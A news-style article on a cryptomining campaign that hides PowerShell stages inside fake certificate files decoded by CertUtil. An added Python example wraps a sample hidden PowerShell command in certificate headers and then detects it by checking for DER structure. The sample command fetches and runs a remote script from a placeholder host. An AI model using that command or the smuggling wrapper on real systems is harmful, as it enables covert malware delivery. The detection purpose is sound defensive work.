Reports by the cybersecurity firm Trend Micro indicate that the newly reported malware exploits a server vulnerability to run a command that kicks off a chain of routines. According to the researchers, the code avoids discovery by hiding its next stage inside certificate files.
Tucked inside what looks like an ordinary certificate, the payload slips past antivirus and firewall inspection. The malware uses a PowerShell script to download the certificate file, then runs Windows' own CertUtil tool to decode it, which reveals another command. The trick works because CertUtil's decode step simply strips the BEGIN/END header lines and base64-decodes whatever sits between them; it never checks that the result is actually a certificate.
That command downloads several scripts, among them the Monero miner payload and Update.ps1. The malware then deletes the certificate file and downloads a further script for execution. That script launches the crypto miner, so each run of the update routine leaves the machine mining Monero.
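The certificate trick described above, as an added example that is not code from Trend Micro or from the article: it builds a file that looks like a PEM certificate but carries a PowerShell command, recovers what CertUtil's decode step would write out, and applies the check a defender can use to tell a genuine certificate from a smuggled payload (a real certificate is a single DER SEQUENCE; a command is not). The command, the URL and the stand-in DER body are constructed for the example.

```python
"""
Added example (not code from Trend Micro or from the article): how a command
can ride inside a file that looks like a PEM certificate, what CertUtil's
decode step recovers from it, and a check that separates a genuine
certificate from a smuggled payload. The command and URL are constructed.
"""
import base64
import re

PEM_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S
)


def armor(payload: bytes) -> str:
    """Base64-encode bytes and wrap them in certificate headers, 64 chars per
    line, the layout `certutil -decode` expects. certutil strips the BEGIN/END
    lines and decodes the body; it never checks that the result is a
    certificate, which is exactly what the loader relies on."""
    b64 = base64.b64encode(payload).decode("ascii")
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return f"-----BEGIN CERTIFICATE-----\n{body}\n-----END CERTIFICATE-----\n"


def decode_like_certutil(text: str) -> bytes:
    """Recover the bytes `certutil -decode <file>` would write out."""
    m = PEM_BLOCK.search(text)
    if m is None:
        raise ValueError("no BEGIN/END CERTIFICATE block found")
    return base64.b64decode("".join(m.group(1).split()))


def is_der_sequence(payload: bytes) -> bool:
    """Every X.509 certificate is one DER SEQUENCE: tag 0x30, then a length
    that covers exactly the rest of the bytes. A smuggled PowerShell command
    starts with printable text, so it fails on the first byte."""
    if len(payload) < 2 or payload[0] != 0x30:
        return False
    first = payload[1]
    if first < 0x80:                      # short-form length
        length, header = first, 2
    else:                                 # long form: 0x8N then N length bytes
        n = first & 0x7F
        if n == 0 or n > 4 or len(payload) < 2 + n:
            return False
        length = int.from_bytes(payload[2:2 + n], "big")
        header = 2 + n
    return header + length == len(payload)


def classify(text: str) -> str:
    """'certificate' if the decoded body is DER, otherwise 'smuggled'."""
    payload = decode_like_certutil(text)
    return "certificate" if is_der_sequence(payload) else "smuggled"


# Constructed samples. The host name is a placeholder, not one from the report.
SAMPLE_COMMAND = (
    "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/Update.ps1')\""
)
SMUGGLED_PEM = armor(SAMPLE_COMMAND.encode("utf-8"))

# Stand-in for a real certificate body: a well-formed DER SEQUENCE holding
# INTEGER 2 and OCTET STRING b"abc". Not a certificate, but the same outer shape.
GENUINE_DER = bytes.fromhex("30 08 02 01 02 04 03 61 62 63")
GENUINE_PEM = armor(GENUINE_DER)

if __name__ == "__main__":
    print(SMUGGLED_PEM)
    print("decodes to  :", decode_like_certutil(SMUGGLED_PEM).decode())
    print("smuggled file:", classify(SMUGGLED_PEM))
    print("genuine file :", classify(GENUINE_PEM))
```

The DER shape check is cheap enough to run over every file a `certutil -decode` invocation touches, or over downloads that arrive with a certificate extension, and it catches the case the article describes without needing a signature for the specific command. It is a structural test, not proof of a valid certificate: a body that passes should still be handed to a real X.509 parser before it is trusted.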
A rise in Crypto Mining Attacks
It would appear that cryptojackers are increasingly on the prowl, with a growing number of campaigns seen over the last couple of months. April 2019 opened with waves of crypto mining attacks that paired the EternalBlue exploit with PowerShell.
According to Trend Micro, the use of obfuscation techniques is nothing new. True to form, BlackSquid, a new malware family capable of exploiting eight different server vulnerabilities, was found installing the XMRig Monero miner, and among its evasions it checks for hardware breakpoints to detect when it is being debugged.
Reports indicate that this new family uses “brute-force attacks, anti-debugging, and anti-virtualisation” to avoid detection and gain full control of the system. Researchers consider it one of the biggest crypto mining malware families encountered so far.
Security experts advise that mining malware of this kind is better combated with threat intelligence feeds integrated into a security information and event management (SIEM) tool. Correlating the feed's indicators with server and network logs lets defenders pick out traffic and files that carry malware disguised as something benign, such as the decoy certificate downloads and CertUtil decoding steps described above.
To this end, Oracle, whose product is affected, released an update that closes the vulnerability the malware uses as its attack vector. Although no specific mining incident has been reported since the malware came to light, the update is expected to keep the attacks at bay; servers that cannot be patched promptly should at least be watched for the download-and-decode behaviour the campaign depends on.